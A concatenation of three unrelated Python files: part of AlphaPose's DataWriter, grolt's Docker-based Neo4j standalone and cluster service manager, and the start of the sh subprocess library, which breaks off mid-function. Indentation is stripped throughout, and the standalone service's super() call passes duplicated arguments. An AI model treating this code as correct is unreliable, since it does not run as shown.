for i in range(len(poseflow_result)):
result['result'][i]['idx'] = poseflow_result[i]['idx']
self.wait_and_put(self.final_result_queue, result)
if self.opt.save_img or self.save_video or self.opt.vis:
if hm_data.size()[1] == 49:
from alphapose.utils.vis import vis_frame_dense as vis_frame
elif self.opt.vis_fast:
from alphapose.utils.vis import vis_frame_fast as vis_frame
else:
from alphapose.utils.vis import vis_frame
img = vis_frame(orig_img, result, add_bbox=(self.opt.pose_track | self.opt.tracking))
self.write_image(img, im_name, stream=stream if self.save_video else None)
def write_image(self, img, im_name, stream=None):
if self.opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if self.opt.save_img:
cv2.imwrite(os.path.join(self.opt.outputpath, 'vis', im_name), img)
if self.save_video:
stream.write(img)
def wait_and_put(self, queue, item):
queue.put(item)
def wait_and_get(self, queue):
return queue.get()
def save(self, boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name):
self.commit()
# save next frame in the queue
self.wait_and_put(self.result_queue, (boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name))
def running(self):
# indicate that the thread is still running
time.sleep(0.2)
self.commit()
return not self.result_queue.empty()
def count(self):
# indicate the remaining images
return self.result_queue.qsize()
def stop(self):
# indicate that the thread should be stopped
self.save(None, None, None, None, None, None, None)
while True:
final_res = self.wait_and_get(self.final_result_queue)
if final_res:
self.final_result.append(final_res)
else:
break
self.result_worker.join()
def clear_queues(self):
self.clear(self.result_queue)
self.clear(self.final_result_queue)
def clear(self, queue):
while not queue.empty():
queue.get()
def commit(self):
# commit finished final results to main process
while not self.final_result_queue.empty():
self.final_result.append(self.wait_and_get(self.final_result_queue))
def results(self):
# return final result
return self.final_result
def recognize_video_ext(self, ext=''):
if ext == 'mp4':
return cv2.VideoWriter_fourcc(*'mp4v'), '.' + ext
elif ext == 'avi':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
elif ext == 'mov':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
else:
print("Unknow video format {}, will use .mp4 instead of it".format(ext))
return cv2.VideoWriter_fourcc(*'mp4v'), '.mp4'
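# Minimal usage sketch (cfg/opt stand for the config and argument objects that AlphaPose's
# own demo scripts build; the variable names here are assumptions):
#   writer = DataWriter(cfg, opt, save_video=False).start()
#   writer.save(boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name)  # per frame
#   writer.stop()                 # sends the None sentinel and joins the worker
#   results = writer.results()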
|
__init__.py
|
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) 2002-2016 "Neo Technology,"
# Network Engine for Objects in Lund AB [http://neotechnology.com]
#
# This file is part of Neo4j.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import namedtuple
from itertools import chain
from logging import getLogger
from math import ceil
from os import makedirs
from os.path import isdir
from os.path import join as path_join
from random import choice
from threading import Thread
from time import monotonic, sleep
from xml.etree import ElementTree
from grolt.addressing import Address
from grolt.auth import Auth, make_auth
from grolt.client import AddressList, Connection
from grolt.server.console import Neo4jConsole, Neo4jClusterConsole
from grolt.server.images import resolve_image
log = getLogger("grolt")
debug_opts_type = namedtuple("debug_opts_type", ["suspend", "port"])
class Neo4jDirectorySpec:
def __init__(self,
certificates_dir=None,
import_dir=None,
logs_dir=None,
plugins_dir=None,
shared_dirs=None,
neo4j_source_dir=None,
):
self.certificates_dir = certificates_dir
self.import_dir = import_dir
self.logs_dir = logs_dir
self.plugins_dir = plugins_dir
self.shared_dirs = shared_dirs
self.neo4j_source_dir = neo4j_source_dir
def volumes(self, name):
volumes = {}
if self.certificates_dir:
volumes[self.certificates_dir] = {
"bind": "/var/lib/neo4j/certificates",
"mode": "ro",
}
if self.import_dir:
volumes[self.import_dir] = {
"bind": "/var/lib/neo4j/import",
"mode": "ro",
}
if self.logs_dir:
volumes[path_join(self.logs_dir, name)] = {
"bind": "/var/lib/neo4j/logs",
"mode": "rw",
}
if self.plugins_dir:
volumes[self.plugins_dir] = {
"bind": "/plugins",
"mode": "ro",
}
if self.shared_dirs:
for shared_dir in self.shared_dirs:
volumes[shared_dir.source] = {
"bind": shared_dir.destination,
"mode": "rw",
}
if self.neo4j_source_dir:
pom = ElementTree.parse(self.neo4j_source_dir + "/pom.xml").getroot()
xml_tag_prefix = pom.tag.split("project")[0]
neo4j_version = pom.find(xml_tag_prefix+"version").text
lib = self.neo4j_source_dir + f"/private/packaging/standalone/target/neo4j-enterprise-{neo4j_version}-unix/neo4j-enterprise-{neo4j_version}/lib"
bin = self.neo4j_source_dir + f"/private/packaging/standalone/target/neo4j-enterprise-{neo4j_version}-unix/neo4j-enterprise-{neo4j_version}/bin"
if not isdir(lib):
raise Exception(f"Could not find packaged neo4j source at {lib}\nPerhaps you need to run mvn package?")
volumes[lib] = {
"bind": "/var/lib/neo4j/lib/",
"mode": "ro",
}
volumes[bin] = {
"bind": "/var/lib/neo4j/bin/",
"mode": "ro",
}
return volumes
class Neo4jMachineSpec:
# Base config for all machines. This can be overridden by
# individual instances.
config = {
"dbms.backup.enabled": "false",
"dbms.transaction.bookmark_ready_timeout": "5s",
"dbms.routing.enabled": "true",
}
discovery_port = 5000
transaction_port = 6000
raft_port = 7000
debug_port = 5100
bolt_internal_port = 7688
def __init__(
self,
name,
service_name,
bolt_port,
http_port,
https_port,
debug_opts,
dir_spec,
config,
env
):
self.name = name
self.service_name = service_name
self.bolt_port = bolt_port
self.http_port = http_port
self.https_port = https_port
self.dir_spec = dir_spec
self.debug_opts = debug_opts
self.env = dict(env or {})
self.config = dict(self.config or {})
if debug_opts.port is not None:
self._add_debug_opts(debug_opts)
self.config["dbms.connector.bolt.advertised_address"] = \
"localhost:{}".format(self.bolt_port)
self.config["dbms.connector.http.advertised_address"] = \
"localhost:{}".format(self.http_port)
self.config["dbms.routing.advertised_address"] = \
self.bolt_internal_address
if config:
self.config.update(**config)
def __hash__(self):
return hash(self.fq_name)
@property
def fq_name(self):
return "{}.{}".format(self.name, self.service_name)
@property
def discovery_address(self):
return "{}:{}".format(self.fq_name, self.discovery_port)
@property
def transaction_address(self):
return "{}:{}".format(self.fq_name, self.transaction_port)
@property
def raft_address(self):
return "{}:{}".format(self.fq_name, self.raft_port)
@property
def http_uri(self):
return "http://localhost:{}".format(self.http_port)
@property
def bolt_address(self):
return Address(("localhost", self.bolt_port))
@property
def bolt_internal_address(self):
return "{}:{}".format(self.fq_name, self.bolt_internal_port)
def _add_debug_opts(self, debug_opts):
if debug_opts.port is not None:
suspend = "y" if debug_opts.suspend else "n"
self.env["JAVA_TOOL_OPTIONS"] = (
"-agentlib:jdwp=transport=dt_socket,server=y,"
"suspend={},address=*:{}".format(suspend, self.debug_port)
)
class Neo4jCoreMachineSpec(Neo4jMachineSpec):
def __init__(self, name, service_name, bolt_port, http_port, https_port, debug_opts,
dir_spec, config, env):
config = config or {}
config["dbms.mode"] = "CORE"
super().__init__(name, service_name, bolt_port, http_port, https_port, debug_opts,
dir_spec, config, env)
class Neo4jReplicaMachineSpec(Neo4jMachineSpec):
def __init__(self, name, service_name, bolt_port, http_port, https_port, debug_opts,
dir_spec, config, env):
config = config or {}
config["dbms.mode"] = "READ_REPLICA"
super().__init__(name, service_name, bolt_port, http_port, https_port, debug_opts,
dir_spec, config, env)
class Neo4jMachine:
""" A single Neo4j server instance, potentially part of a cluster.
"""
container = None
ip_address = None
ready = 0
def __init__(self, spec, image, auth):
from docker import DockerClient
from docker.errors import ImageNotFound
self.spec = spec
self.image = image
self.address = Address(("localhost", self.spec.bolt_port))
self.addresses = AddressList([("localhost", self.spec.bolt_port)])
self.auth = auth
self.docker = DockerClient.from_env(version="auto")
environment = {}
if self.auth:
environment["NEO4J_AUTH"] = "/".join(self.auth)
environment["NEO4J_ACCEPT_LICENSE_AGREEMENT"] = "yes"
for key, value in self.spec.config.items():
fixed_key = "NEO4J_" + key.replace("_", "__").replace(".", "_")
environment[fixed_key] = value
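# e.g. (illustrative) "dbms.connector.bolt.advertised_address" becomes the container
# environment variable NEO4J_dbms_connector_bolt_advertised__address, following the
# official Neo4j Docker image convention of '_' -> '__' and '.' -> '_'.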
for key, value in self.spec.env.items():
environment[key] = value
ports = {
"7474/tcp": self.spec.http_port,
"7473/tcp": self.spec.https_port,
"7687/tcp": self.spec.bolt_port,
}
if self.spec.debug_opts.port is not None:
ports["5100/tcp"] = self.spec.debug_opts.port
if self.spec.dir_spec:
volumes = self.spec.dir_spec.volumes(self.spec.name)
for path in volumes:
makedirs(path, exist_ok=True)
else:
volumes = None
def create_container(img):
return self.docker.containers.create(
img,
detach=True,
environment=environment,
hostname=self.spec.fq_name,
name=self.spec.fq_name,
network=self.spec.service_name,
ports=ports,
volumes=volumes,
)
try:
self.container = create_container(self.image)
except ImageNotFound:
log.info("Downloading Docker image %r", self.image)
self.docker.images.pull(self.image)
self.container = create_container(self.image)
def __hash__(self):
return hash(self.container)
def __repr__(self):
return "%s(fq_name={!r}, image={!r}, address={!r})".format(
self.__class__.__name__, self.spec.fq_name,
self.image, self.addresses)
def start(self):
from docker.errors import APIError
log.info("Starting machine %r at "
"«%s»", self.spec.fq_name, self.addresses)
try:
self.container.start()
self.container.reload()
self.ip_address = (self.container.attrs["NetworkSettings"]
["Networks"][self.spec.service_name]["IPAddress"])
except APIError as e:
log.info(e)
log.debug("Machine %r has internal IP address "
"«%s»", self.spec.fq_name, self.ip_address)
def restart(self):
from docker.errors import APIError
log.info("Restarting machine %r at "
"«%s»", self.spec.fq_name, self.addresses)
try:
self.container.restart()
self.container.reload()
self.ip_address = (self.container.attrs["NetworkSettings"]
["Networks"][self.spec.service_name]["IPAddress"])
except APIError as e:
log.info(e)
log.debug("Machine %r has internal IP address "
"«%s»", self.spec.fq_name, self.ip_address)
def ping(self, timeout):
try:
with Connection.open(*self.addresses, auth=self.auth,
timeout=timeout):
log.info("Machine {!r} available".format(self.spec.fq_name))
except OSError:
log.info("Machine {!r} unavailable".format(self.spec.fq_name))
def await_started(self, timeout):
sleep(1)
self.container.reload()
if self.container.status == "running":
try:
self.ping(timeout)
except OSError:
self.container.reload()
state = self.container.attrs["State"]
if state["Status"] == "exited":
self.ready = -1
log.error("Machine %r exited with code %r",
self.spec.fq_name, state["ExitCode"])
for line in self.container.logs().splitlines():
log.error("> %s" % line.decode("utf-8"))
else:
log.error("Machine %r did not become available "
"within %rs", self.spec.fq_name, timeout)
else:
self.ready = 1
else:
log.error("Machine %r is not running (status=%r)",
self.spec.fq_name, self.container.status)
for line in self.container.logs().splitlines():
log.error("> %s" % line.decode("utf-8"))
def stop(self, timeout=None):
log.info("Stopping machine %r", self.spec.fq_name)
self.container.stop(timeout=timeout)
self.container.remove(force=True)
class Neo4jRoutingTable:
""" Address lists for a Neo4j service.
"""
def __init__(self, routers=()):
self.routers = AddressList(routers)
self.readers = AddressList()
self.writers = AddressList()
self.last_updated = 0
self.ttl = 0
def update(self, server_lists, ttl):
new_routers = AddressList()
new_readers = AddressList()
new_writers = AddressList()
for server_list in server_lists:
role = server_list["role"]
addresses = map(Address.parse, server_list["addresses"])
if role == "ROUTE":
new_routers[:] = addresses
elif role == "READ":
new_readers[:] = addresses
elif role == "WRITE":
new_writers[:] = addresses
self.routers[:] = new_routers
self.readers[:] = new_readers
self.writers[:] = new_writers
self.last_updated = monotonic()
self.ttl = ttl
def expired(self):
age = monotonic() - self.last_updated
return age >= self.ttl
def age(self):
age = monotonic() - self.last_updated
m, s = divmod(age, 60)
parts = []
if m:
parts.append("{:.0f}m".format(m))
parts.append("{:.0f}s".format(s))
if age >= self.ttl:
parts.append("(expired)")
return " ".join(parts)
class Neo4jService:
""" A Neo4j database management service.
"""
default_image = NotImplemented
default_bolt_port = 7687
default_http_port = 7474
default_https_port = 7473
default_debug_port = 5005
snapshot_host = "live.neo4j-build.io"
snapshot_build_config_id = "Neo4j40_Docker"
snapshot_build_url = ("https://{}/repository/download/{}/"
"lastSuccessful".format(snapshot_host,
snapshot_build_config_id))
def __new__(cls, name=None, image=None, auth=None,
n_cores=None, n_replicas=None,
bolt_port=None, http_port=None, https_port=None,
debug_port=None, debug_suspend=None,
dir_spec=None, config=None, env=None):
if n_cores:
return object.__new__(Neo4jClusterService)
else:
return object.__new__(Neo4jStandaloneService)
@classmethod
def _random_name(cls):
return "".join(choice("bcdfghjklmnpqrstvwxz") for _ in range(7))
# noinspection PyUnusedLocal
def __init__(self, name=None, image=None, auth=None,
n_cores=None, n_replicas=None,
bolt_port=None, http_port=None, https_port=None,
debug_port=None, debug_suspend=None, dir_spec=None,
config=None, env=None):
from docker import DockerClient
self.name = name or self._random_name()
self.docker = DockerClient.from_env(version="auto")
self.image = resolve_image(image or self.default_image)
self.auth = Auth(*auth) if auth else make_auth()
if self.auth.user != "neo4j":
raise ValueError("Auth user must be 'neo4j' or empty")
self.machines = {}
self.network = None
self.routing_tables = {"system": Neo4jRoutingTable()}
self.console = None
def __enter__(self):
try:
self.start(timeout=300)
except KeyboardInterrupt:
self.stop(timeout=300)
raise
else:
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
def _get_machine_by_address(self, address):
address = Address((address.host, address.port_number))
for spec, machine in self.machines.items():
if spec.bolt_address == address:
return machine
def routers(self):
if self.routing_tables["system"].routers:
return list(map(self._get_machine_by_address,
self.routing_tables["system"].routers))
else:
return list(self.machines.values())
def readers(self, tx_context=None):
self.update_routing_info(tx_context, force=False)
return list(map(self._get_machine_by_address,
self.routing_tables[tx_context].readers))
def writers(self, tx_context=None):
self.update_routing_info(tx_context, force=False)
return list(map(self._get_machine_by_address,
self.routing_tables[tx_context].writers))
def ttl(self, context):
return self.routing_tables[context].ttl
def _has_valid_routing_table(self, tx_context):
return (tx_context in self.routing_tables and
not self.routing_tables[tx_context].expired())
def _for_each_machine(self, f):
threads = []
for spec, machine in self.machines.items():
thread = Thread(target=f(machine))
thread.daemon = True
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
def start(self, timeout=None):
log.info("Starting service %r with image %r", self.name, self.image)
self.network = self.docker.networks.create(self.name)
self._for_each_machine(lambda machine: machine.start)
if timeout is not None:
self.await_started(timeout)
def await_started(self, timeout):
def wait(machine):
machine.await_started(timeout=timeout)
self._for_each_machine(wait)
if all(machine.ready == 1 for spec, machine in self.machines.items()):
log.info("Service %r available", self.name)
else:
raise RuntimeError("Service %r unavailable - "
"some machines failed", self.name)
def stop(self, timeout=None):
log.info("Stopping service %r", self.name)
def _stop(machine):
machine.stop(timeout)
self._for_each_machine(_stop)
if self.network:
self.network.remove()
@property
def addresses(self):
return AddressList(chain(*(r.addresses for r in self.routers())))
@classmethod
def find_and_stop(cls, service_name):
from docker import DockerClient
docker = DockerClient.from_env(version="auto")
for container in docker.containers.list(all=True):
if container.name.endswith(".{}".format(service_name)):
container.stop()
container.remove(force=True)
docker.networks.get(service_name).remove()
def update_routing_info(self, tx_context, *, force=False):
if self._has_valid_routing_table(tx_context) and not force:
return None
with Connection.open(*self.addresses, auth=self.auth) as cx:
routing_context = {}
records = []
if cx.bolt_version >= 4:
run = cx.run("CALL dbms.cluster.routing."
"getRoutingTable($rc, $tc)", {
"rc": routing_context,
"tc": tx_context,
})
else:
run = cx.run("CALL dbms.cluster.routing."
"getRoutingTable($rc)", {
"rc": routing_context,
})
cx.pull(-1, -1, records)
cx.send_all()
cx.fetch_all()
if run.error:
log.debug(run.error.args[0])
return False
if records:
ttl, server_lists = records[0]
rt = self.routing_tables.setdefault(tx_context,
Neo4jRoutingTable())
rt.update(server_lists, ttl)
return True
else:
return False
def run_console(self):
self.console = Neo4jConsole(self)
self.console.invoke("env")
self.console.run()
def env(self):
addr = AddressList(chain(*(r.addresses for r in self.routers())))
auth = "{}:{}".format(self.auth.user, self.auth.password)
return {
"BOLT_SERVER_ADDR": str(addr),
"NEO4J_AUTH": auth,
}
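# Usage sketch (image and credentials are illustrative): a plain call returns a standalone
# service, while passing n_cores (3-7) yields a Neo4jClusterService via the __new__
# dispatch above:
#   with Neo4jService(name="demo", image="neo4j:latest", auth=("neo4j", "secret")) as svc:
#       print(svc.addresses)   # Bolt addresses of the current routers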
class Neo4jStandaloneService(Neo4jService):
default_image = "neo4j:latest"
def __init__(self, name=None, image=None, auth=None,
n_cores=None, n_replicas=None,
bolt_port=None, http_port=None, https_port=None, debug_port=None,
debug_suspend=None, dir_spec=None, config=None, env=None):
super().__init__(name, image, auth,
n_cores, n_replicas,
bolt_port, http_port, https_port,
bolt_port, http_port, https_port, debug_port,
debug_suspend, dir_spec, config, env)
spec = Neo4jMachineSpec(
name="a",
service_name=self.name,
bolt_port=bolt_port or self.default_bolt_port,
http_port=http_port or self.default_http_port,
https_port=https_port or self.default_https_port,
debug_opts=debug_opts_type(debug_suspend, debug_port),
dir_spec=dir_spec,
config=config,
env=env,
)
self.machines[spec] = Neo4jMachine(
spec,
self.image,
auth=self.auth,
)
class Neo4jClusterService(Neo4jService):
default_image = "neo4j:enterprise"
# The minimum and maximum number of cores permitted
min_cores = 3
max_cores = 7
# The minimum and maximum number of read replicas permitted
min_replicas = 0
max_replicas = 9
default_bolt_port = 17601
default_http_port = 17401
default_debug_port = 15001
@classmethod
def _port_range(cls, base_port, count):
if base_port is None:
return [None] * count
else:
return range(base_port, base_port + count)
def __init__(self, name=None, image=None, auth=None,
n_cores=None, n_replicas=None,
bolt_port=None, http_port=None, https_port=None, debug_port=None,
debug_suspend=None, dir_spec=None, config=None, env=None):
super().__init__(name, image, auth,
n_cores, n_replicas,
bolt_port, http_port, https_port, debug_port,
debug_suspend, dir_spec, config, env)
n_cores = n_cores or self.min_cores
n_replicas = n_replicas or self.min_replicas
if not self.min_cores <= n_cores <= self.max_cores:
raise ValueError("A cluster must have been {} and {} "
"cores".format(self.min_cores, self.max_cores))
if not self.min_replicas <= n_replicas <= self.max_replicas:
raise ValueError("A cluster must have been {} and {} "
"read replicas".format(self.min_replicas,
self.max_replicas))
core_bolt_port_range = self._port_range(
bolt_port or self.default_bolt_port, self.max_cores)
core_http_port_range = self._port_range(
http_port or self.default_http_port, self.max_cores)
core_https_port_range = self._port_range(
https_port or self.default_https_port, self.max_cores)
core_debug_port_range = self._port_range(debug_port, self.max_cores)
self.free_core_machine_specs = [
Neo4jCoreMachineSpec(
name=chr(97 + i),
service_name=self.name,
bolt_port=core_bolt_port_range[i],
http_port=core_http_port_range[i],
https_port=core_https_port_range[i],
# Only suspend first core in cluster, otherwise cluster won't form until debuggers
# connect to all of them.
debug_opts=debug_opts_type(debug_suspend if i == 0 else False, core_debug_port_range[i]),
dir_spec=dir_spec,
config=dict(config or {}, **{
"causal_clustering.minimum_core_cluster_size_at_formation":
n_cores or self.min_cores,
"causal_clustering.minimum_core_cluster_size_at_runtime":
self.min_cores,
}),
env=env,
)
for i in range(self.max_cores)
]
replica_bolt_port_range = self._port_range(
ceil(core_bolt_port_range.stop / 10) * 10 + 1, self.max_replicas)
replica_http_port_range = self._port_range(
ceil(core_http_port_range.stop / 10) * 10 + 1, self.max_replicas)
replica_https_port_range = self._port_range(
ceil(core_https_port_range.stop / 10) * 10 + 1, self.max_replicas)
if debug_port:
replica_debug_port_range = self._port_range(
ceil(core_debug_port_range.stop / 10) * 10 + 1, self.max_replicas)
else:
replica_debug_port_range = self._port_range(None, self.max_replicas)
self.free_replica_machine_specs = [
Neo4jReplicaMachineSpec(
name=chr(49 + i),
service_name=self.name,
bolt_port=replica_bolt_port_range[i],
http_port=replica_http_port_range[i],
https_port=replica_https_port_range[i],
# Only suspend the first replica, otherwise the cluster won't form until debuggers
# connect to all of them.
debug_opts=debug_opts_type(debug_suspend if i == 0 else False, replica_debug_port_range[i]),
dir_spec=dir_spec,
config=config,
env=env,
)
for i in range(self.max_replicas)
]
# Add core machine specs
for i in range(n_cores or self.min_cores):
spec = self.free_core_machine_specs.pop(0)
self.machines[spec] = None
# Add replica machine specs
for i in range(n_replicas or self.min_replicas):
spec = self.free_replica_machine_specs.pop(0)
self.machines[spec] = None
self._boot_machines()
def _boot_machines(self):
discovery_addresses = [spec.discovery_address for spec in self.machines
if isinstance(spec, Neo4jCoreMachineSpec)]
for spec, machine in self.machines.items():
if machine is None:
spec.config.update({
"causal_clustering.initial_discovery_members":
",".join(discovery_addresses),
})
self.machines[spec] = Neo4jMachine(spec, self.image, self.auth)
def cores(self):
return [machine for spec, machine in self.machines.items()
if isinstance(spec, Neo4jCoreMachineSpec)]
def replicas(self):
return [machine for spec, machine in self.machines.items()
if isinstance(spec, Neo4jReplicaMachineSpec)]
def routers(self):
if self.routing_tables["system"].routers:
return list(map(self._get_machine_by_address,
self.routing_tables["system"].routers))
else:
return list(self.cores())
def run_console(self):
self.console = Neo4jClusterConsole(self)
self.console.run()
def add_core(self):
""" Add new core server
"""
if len(self.cores()) < self.max_cores:
spec = self.free_core_machine_specs.pop(0)
self.machines[spec] = None
self._boot_machines()
self.machines[spec].start()
self.machines[spec].await_started(300)
else:
raise RuntimeError("A maximum of {} cores "
"is permitted".format(self.max_cores))
def add_replica(self):
""" Add new replica server
"""
if len(self.replicas()) < self.max_replicas:
spec = self.free_replica_machine_specs.pop(0)
self.machines[spec] = None
self._boot_machines()
self.machines[spec].start()
self.machines[spec].await_started(300)
else:
raise RuntimeError("A maximum of {} replicas "
"is permitted".format(self.max_replicas))
def _remove_machine(self, spec):
machine = self.machines[spec]
del self.machines[spec]
machine.stop()
if isinstance(spec, Neo4jCoreMachineSpec):
self.free_core_machine_specs.append(spec)
elif isinstance(spec, Neo4jReplicaMachineSpec):
self.free_replica_machine_specs.append(spec)
def remove(self, name):
""" Remove a server by name (e.g. 'a', 'a.fbe340d').
"""
found = 0
for spec, machine in list(self.machines.items()):
if name in (spec.name, spec.fq_name):
self._remove_machine(spec)
found += 1
return found
def reboot(self, name):
found = 0
for spec, machine in list(self.machines.items()):
if name in (spec.name, spec.fq_name):
machine.restart()
machine.await_started(300)
found += 1
return found
|
sh.py
|
"""
http://amoffat.github.io/sh/
"""
#===============================================================================
# Copyright (C) 2011-2017 by Andrew Moffat
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#===============================================================================
__version__ = "1.12.14"
__project_url__ = "https://github.com/amoffat/sh"
import platform
if "windows" in platform.system().lower(): # pragma: no cover
raise ImportError("sh %s is currently only supported on linux and osx. \
please install pbs 0.110 (http://pypi.python.org/pypi/pbs) for windows \
support." % __version__)
import sys
IS_PY3 = sys.version_info[0] == 3
MINOR_VER = sys.version_info[1]
IS_PY26 = sys.version_info[0] == 2 and MINOR_VER == 6
import traceback
import os
import re
import time
import getpass
from types import ModuleType, GeneratorType
from functools import partial
import inspect
import tempfile
import warnings
import stat
import glob as glob_module
import ast
from contextlib import contextmanager
import pwd
import errno
from io import UnsupportedOperation, open as fdopen
from locale import getpreferredencoding
DEFAULT_ENCODING = getpreferredencoding() or "UTF-8"
# normally i would hate this idea of using a global to signify whether we are
# running tests, because it breaks the assumption that what is running in the
# tests is what will run live, but we ONLY use this in a place that has no
# serious side-effects that could change anything. as long as we do that, it
# should be ok
RUNNING_TESTS = bool(int(os.environ.get("SH_TESTS_RUNNING", "0")))
FORCE_USE_SELECT = bool(int(os.environ.get("SH_TESTS_USE_SELECT", "0")))
if IS_PY3:
from io import StringIO
ioStringIO = StringIO
from io import BytesIO as cStringIO
iocStringIO = cStringIO
from queue import Queue, Empty
# for some reason, python 3.1 removed the builtin "callable", wtf
if not hasattr(__builtins__, "callable"):
def callable(ob):
return hasattr(ob, "__call__")
else:
from StringIO import StringIO
from cStringIO import OutputType as cStringIO
from io import StringIO as ioStringIO
from io import BytesIO as iocStringIO
from Queue import Queue, Empty
try:
from shlex import quote as shlex_quote # here from 3.3 onward
except ImportError:
from pipes import quote as shlex_quote # undocumented before 2.7
IS_OSX = platform.system() == "Darwin"
THIS_DIR = os.path.dirname(os.path.realpath(__file__))
SH_LOGGER_NAME = __name__
import errno
import pty
import termios
import signal
import gc
import select
import threading
import tty
import fcntl
import struct
import resource
from collections import deque
import logging
import weakref
# a re-entrant lock for pushd. this way, multiple threads that happen to use
# pushd will all see the current working directory for the duration of the
# with-context
PUSHD_LOCK = threading.RLock()
if hasattr(inspect, "getfullargspec"):
def get_num_args(fn):
return len(inspect.getfullargspec(fn).args)
else:
def get_num_args(fn):
return len(inspect.getargspec(fn).args)
if IS_PY3:
raw_input = input
unicode = str
basestring = str
long = int
_unicode_methods = set(dir(unicode()))
HAS_POLL = hasattr(select, "poll")
POLLER_EVENT_READ = 1
POLLER_EVENT_WRITE = 2
POLLER_EVENT_HUP = 4
POLLER_EVENT_ERROR = 8
# here we use a poller interface that transparently selects the most
# capable poller (out of either select.select or select.poll). this was added
# by zhangyafeikimi when he discovered that if the fds created internally by sh
# numbered > 1024, select.select failed (a limitation of select.select). this
# can happen if your script opens a lot of files
if HAS_POLL and not FORCE_USE_SELECT:
class Poller(object):
def __init__(self):
self._poll = select.poll()
# file descriptor <-> file object bidirectional maps
self.fd_lookup = {}
self.fo_lookup = {}
def __nonzero__(self):
return len(self.fd_lookup) != 0
def __len__(self):
return len(self.fd_lookup)
def _set_fileobject(self, f):
if hasattr(f, "fileno"):
fd = f.fileno()
self.fd_lookup[fd] = f
self.fo_lookup[f] = fd
else:
self.fd_lookup[f] = f
self.fo_lookup[f] = f
def _remove_fileobject(self, f):
if hasattr(f, "fileno"):
fd = f.fileno()
del self.fd_lookup[fd]
del self.fo_lookup[f]
else:
del self.fd_lookup[f]
del self.fo_lookup[f]
def _get_file_descriptor(self, f):
return self.fo_lookup.get(f)
def _get_file_object(self, fd):
return self.fd_lookup.get(fd)
def _register(self, f, events):
# f can be a file descriptor or file object
self._set_fileobject(f)
fd = self._get_file_descriptor(f)
self._poll.register(fd, events)
def register_read(self, f):
self._register(f, select.POLLIN | select.POLLPRI)
def register_write(self, f):
self._register(f, select.POLLOUT)
def register_error(self, f):
self._register(f, select.POLLERR | select.POLLHUP | select.POLLNVAL)
def unregister(self, f):
fd = self._get_file_descriptor(f)
self._poll.unregister(fd)
self._remove_fileobject(f)
def poll(self, timeout):
if timeout is not None:
# convert from seconds to milliseconds
timeout *= 1000
changes = self._poll.poll(timeout)
results = []
for fd, events in changes:
f = self._get_file_object(fd)
if events & (select.POLLIN | select.POLLPRI):
results.append((f, POLLER_EVENT_READ))
elif events & (select.POLLOUT):
results.append((f, POLLER_EVENT_WRITE))
elif events & (select.POLLHUP):
results.append((f, POLLER_EVENT_HUP))
elif events & (select.POLLERR | select.POLLNVAL):
results.append((f, POLLER_EVENT_ERROR))
return results
else:
class Poller(object):
def __init__(self):
self.rlist = []
self.wlist = []
self.xlist = []
def __nonzero__(self):
return len(self.rlist) + len(self.wlist) + len(self.xlist) != 0
def __len__(self):
return len(self.rlist) + len(self.wlist) + len(self.xlist)
def _register(self, f, l):
if f not in l:
l.append(f)
def _unregister(self, f, l):
if f in l:
l.remove(f)
def register_read(self, f):
self._register(f, self.rlist)
def register_write(self, f):
self._register(f, self.wlist)
def register_error(self, f):
self._register(f, self.xlist)
def unregister(self, f):
self._unregister(f, self.rlist)
self._unregister(f, self.wlist)
self._unregister(f, self.xlist)
def poll(self, timeout):
_in, _out, _err = select.select(self.rlist, self.wlist, self.xlist, timeout)
results = []
for f in _in:
results.append((f, POLLER_EVENT_READ))
for f in _out:
results.append((f, POLLER_EVENT_WRITE))
for f in _err:
results.append((f, POLLER_EVENT_ERROR))
return results
def encode_to_py3bytes_or_py2str(s):
""" takes anything and attempts to return a py2 string or py3 bytes. this
is typically used when creating command + arguments to be executed via
os.exec* """
fallback_encoding = "utf8"
if IS_PY3:
# if we're already bytes, do nothing
if isinstance(s, bytes):
pass
else:
s = str(s)
try:
s = bytes(s, DEFAULT_ENCODING)
except UnicodeEncodeError:
s = bytes(s, fallback_encoding)
else:
# attempt to convert the thing to unicode from the system's encoding
try:
s = unicode(s, DEFAULT_ENCODING)
# if the thing is already unicode, or it's a number, it can't be
# coerced to unicode with an encoding argument, but if we leave out
# the encoding argument, it will convert it to a string, then to unicode
except TypeError:
s = unicode(s)
# now that we have guaranteed unicode, encode to our system encoding,
# but attempt to fall back to something
try:
s = s.encode(DEFAULT_ENCODING)
except:
s = s.encode(fallback_encoding, "replace")
return s
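# Examples (illustrative): on Python 3, encode_to_py3bytes_or_py2str("ls") == b"ls" and
# encode_to_py3bytes_or_py2str(42) == b"42"; on Python 2 the result is a str encoded with
# DEFAULT_ENCODING, falling back to utf8 if that encoding cannot represent the value.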
def _indent_text(text, num=4):
lines = []
for line in text.split("\n"):
